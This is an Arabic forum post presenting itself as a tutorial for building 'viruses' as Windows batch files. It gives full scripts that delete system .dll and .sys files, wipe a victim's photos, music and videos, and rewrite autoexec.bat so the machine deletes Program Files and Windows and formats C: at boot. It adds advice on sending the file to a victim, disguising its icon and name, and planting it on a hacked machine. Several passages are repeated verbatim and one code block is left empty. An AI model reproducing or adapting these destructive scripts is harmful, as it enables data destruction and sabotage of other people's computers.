طريقه عمل الفيروسات
M.E.T :: قسم البرامج :: البرامج العامه
صفحة 1 من اصل 1
طريقه عمل الفيروسات
كيف تقوم بعمل فيروسات بنفسك
--------------------------------------------------------------------------------
بسم الله الرحمن الرحيم
][][^][][كيفيه تصميم فيروس واخطر الفيروسات على الجهاز][][^][][
ما هو اخطر الاشيى التي تخاف منها على جهازك
هما شيىين اثناين
1-الهاكرز
2الفيروسات
وكثيرا
ما تجعلك الفيروسات تقوم برفس جهازك وتبي تحطمه بعض الاحيان من كثر
الفيروسات فما رايك انت تكون الفيروسات هذه من صنعك وطوع امرك بس على شرط
ان لا تستخدموها لئذيه العرب و المسلمين اوكي.
|--*¨¨*--|الدرس الان|--*¨¨*--|
قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمة و هى التعريف بالفيروس و انواعه و شروطه و التى سوف اوضحها الأن
تعريف الفيروس:
يمكن
تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا او اعتمادا على
احد برامج ويندوز دون علم المستخدم بذلك و هناك فيروسات تشغل نفسها بناء
على وقت الساعة فى الويندوز او تاريخ اليوم و اشهر هذه الفيروسات هو
تشيرنوبل الذى يعمل فى يوم السادس و العشرين من كل شهر و لقد سمى الفيروس
بهذا الأسم نسبة الى الفيروسات الموجودة فى جسم الأنسان و التى تصيبه و
تتكاثر بسرعة فيه و هى نفس فكرة عمل الفيروس الذى يصيب الكومبيوتر
و يجب توافر عدة شروط لكى يصبح الفيروس ذو فاعلية و هى
أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه
أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباط باحد الملفات
أن يكون ذا هدف و مغزى
الأن و بعد ان فهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم
ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا
*•~-.¸¸,.-~*اذا
كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجو ان تقوم بفهم الموضوع
دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اى خطا فى اى
كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحذر من
تصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف
تقوم بها*•~-.¸¸,.-~*
الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فى صناعة الفيروسات
لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة من الطرق لتصميم الفيروسات و هى
عن طريق الـnotepad اوالمفكرة
عن طريق برنامج الفجول بيسك (vb)
عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون)
و سوف اقوم الأن بعرض كل منهم على حدة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقوم به
هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلم تصميم الفيروس بواسطة notepad او المفكرة
للعمل على تصميم فيروس بهذا النوع من التصميمات يجب ان تعرف كيف تضع الشفرات التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الشفرة فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat
و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الشفرة المناسب لك فى الnotepad
و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الى الضحية التى
تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كان لديك
ملاحضة
اذا انت حبيت ان ترى غيروسك بام عينيك ما عليك الى حفضه في مجلد جديد في
سطح المكتب بدون ان تغلق المفكره وكتابه الشفرة وسوف تراه,
قبل
ان اضع لكم الشيفرات اريد ان اوضح ان هذه الشيفرات منقولة طبعا ولاكنى
وضعت تحت كل شفرة اكبر شرح استطيع تقديمه عبر هذا الشيفرات من حيث فكرة
عمله و طريقة تعديله مع مثال بسيط عليه
اريد ان اوضح انه من الأفضل نسخ الشفرة و لصقه فى المكان الذى تريده ولكن بدون نسخ الشرح
----------------------
نبدأ بالشفرة الأولى :
---------------------
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد ان قمت بوضع الشيفرات و حفظه بامتداد .bat
فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير الى
شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان
تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys
" و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين
و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف
نجد فى اول الشفرة الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر
بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز
* بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!
-----
لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان
نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذه الشفرة قليلا وسو
اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذىيمكننا ان
نغيره فى الشفرة فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او
يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك
منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس الى d:
مثال توضيحى :
انا
الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى
ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى
@Echo off
الـتوضـــــــــــتيح :
* بعد ان قمت بوضع الشيفرات و حفظه بامتداد .bat
فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير الى
شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان
تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys
" و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين
و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف
نجد فى اول الشفرة الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر
بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز
* بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!
-----
لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان
نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذه الشفرة قليلا وسو
اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذىيمكننا ان
نغيره فى الشفرة فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او
يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك
منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس الى d:
مثال توضيحى :
انا
الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى
ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراء الكود الثانى
----------------
الشفرة الثانية :
--------------
ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراء الكود الثانى
----------------
الشفرة الثانية :
--------------
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الـتوضـــــــــــتيح :
الفيروس
السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى
فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه
خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الشفرة اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد
بعد
سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن
يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف
نحن نوضحه
الـتوضـــــــــــتيح :
الفيروس
السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى
فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه
خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الشفرة اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد
بعد
سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن
يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف
نحن نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطى هذه الشفرة الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الشفرة
يعطى هذه الشفرة الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الشفرة
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولاكنه
اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك
اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد و هذا هو ما
اعطاه هذان السطرين
ولاكنه
اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك
اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد و هذا هو ما
اعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فتكون الشفرة كما يلى
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فتكون الشفرة كما يلى
تصميم فيروس مدمر سهل جدااااً ماياخذ من وقتكم خمس دقايق
السلااام عليكم ورحمة الله وبركاته
نبدا
اصنع بنفسك فيروس مدمر
وهذه هى الطريقة لصنع فيروس او ملف تنفيذي خطير
حيث يعمل هذا الملف بمجرد تشغيله من قبل الضحية
يقوم هذا الملف بعمل شديد الخطورة حيث يعمل فورمات للجهاز ويحوله الى هارد ديسك فاضي ممسوح البيانات
يتيميز هذا الملف يكون حجمه صغير جدا و كثير من مضادات الفيروسات لا تكتشفه
الطريقة
1- انسخ الكود التالي
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
2-قم بلصق ما نسخت في الدفتر او المفكرة وليس في الوورد
3- احفظ الملف بامتداد bat بحيث يكون اسم الملف مثلا
zz.bat او fff.bat بهذا الشكل
سيصبح شكل الملف عبارة عن مربع ابيض بداخله ترس اصفر اللون
احذر ان تفتح هذا الملف فهو مدمر لكن تقدر تغير اسمه بزر الماوس الايمن وتختار له اعادة تسمية الى اي اسم ويمكن ان تغير شكل ايقونته
كيف؟؟
اضغط بحرص بزر الماوس الايمن على الملف واختر خصائص
ومنها اذهب الى برنامج ومن تحت اضغط على تغيير الرمز ثم اختر اي شكل يعجبك للتمويه وبعدين اضغط موافق
اذن اصبح الان لديك ملف قوي جدا
ارجو ان لا تستخدمه للاضرار بالاخرين فقط عليك استخدامة ضد من يحاول اختراق جهازك لتلقينه درسا لن ينساه
Ahmedzanaty-
عدد الرسائل : 18
العمر : 32
تاريخ التسجيل : 10/03/2010
M.E.T :: قسم البرامج :: البرامج العامه
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى